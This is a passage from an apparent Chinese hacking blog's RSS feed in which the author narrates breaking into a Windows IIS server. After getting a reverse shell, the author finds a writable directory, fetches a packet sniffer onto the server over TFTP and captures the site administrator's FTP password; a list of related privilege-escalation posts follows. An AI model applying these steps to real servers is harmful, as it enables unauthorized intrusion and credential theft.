反弹回来之后就是目录限制的问题了，我已经遇到了很多个服务器，基本上都是这样，把你的权限限制在 C:\windows\system32\inetsrv 目录里面了， C：的根目录你可以进去，但是无可写权限，大家都知道WINDOWS\TEMP可写，但问题是反弹回来的SHELL无权限DIR的，更加别说权限MD了，因此很是郁闷，毕竟是连网站目录也跳转不到了，所以就是上传了XSNIFFER也没有用，无奈之下，想了很久在里面瞎逛了很久，最后当我切入到 ASP Compiled Templates 目录的时候随便输入一个 ： md 123 然后是 cd 123 结果，我还真的进到了123 的目录，然后赶快退出来，立刻再MD WOKAO cd wokao之后，就发现了，这个目录可写，然后在ASP木马里面输入路径：C:\windows\system32\inetsrv\ASP Compiled Templates 结果发现，ASP木马对该目录竟然连访问权都没有，这个时候大家或许就明白了，反弹回来的SHELL的权限与网站的权限是不一样的，呵呵，到了这里，自然就是轻车路熟了，继续之前的想法，架设一个 TFTP服务器， TFTP了一个XSNIFFER出来，然后在本地嗅探，以后就是等了，到第2天，自然就是 ctrl+c 终止嗅叹之后，立刻查看：password.txt 了，拿下目标站的管理员FTP。然后自然就是 OPEN xxxxxxxx 进入该站了目录了···</p>
<p>PS:有一点不是很明白，既然是通过IIS反弹回来的SHELL，那么应该是继承了IIS的权限，但是，基于IIS的权限，有2点不明白，第一，ASP木马为何无权限访问该目录，第二，为何改反弹回来的SHELL无法切入到网站根目录？</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1723.html" title="rar.exe在提权中的妙用">rar.exe在提权中的妙用</a></li><li>2010年04月22日 -- <a href="http://www.4shell.org/archives/1720.html" title="更改windows2003最大连接数">更改windows2003最大连接数</a></li><li>2010年04月20日 -- <a href="http://www.4shell.org/archives/1718.html" title="沙盒提权的小tips">沙盒提权的小tips</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月27日 -- <a href="http://www.4shell.org/archives/1547.html" title="ASP.NET+Win2003虚拟主机安全设置">ASP.NET+Win2003虚拟主机安全设置</a></li><li>2009年12月22日 -- <a href="http://www.4shell.org/archives/1345.html" title="关于搜狗拼音输入法提权的应用">关于搜狗拼音输入法提权的应用</a></li><li>2009年09月25日 -- <a href="http://www.4shell.org/archives/1127.html" title="突破Windows 2003 200k限制的上传程序">突破Windows 2003 200k限制的上传程序</a></li><li>2009年08月5日 -- <a href="http://www.4shell.org/archives/998.html" title="Serv-U FTP Server v8 本地提权">Serv-U FTP Server v8 本地提权</a></li><li>2009年07月23日 -- <a href="http://www.4shell.org/archives/937.html" title="针对Dbowner权限下的提权脚本(转)">针对Dbowner权限下的提权脚本(转)</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/144.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

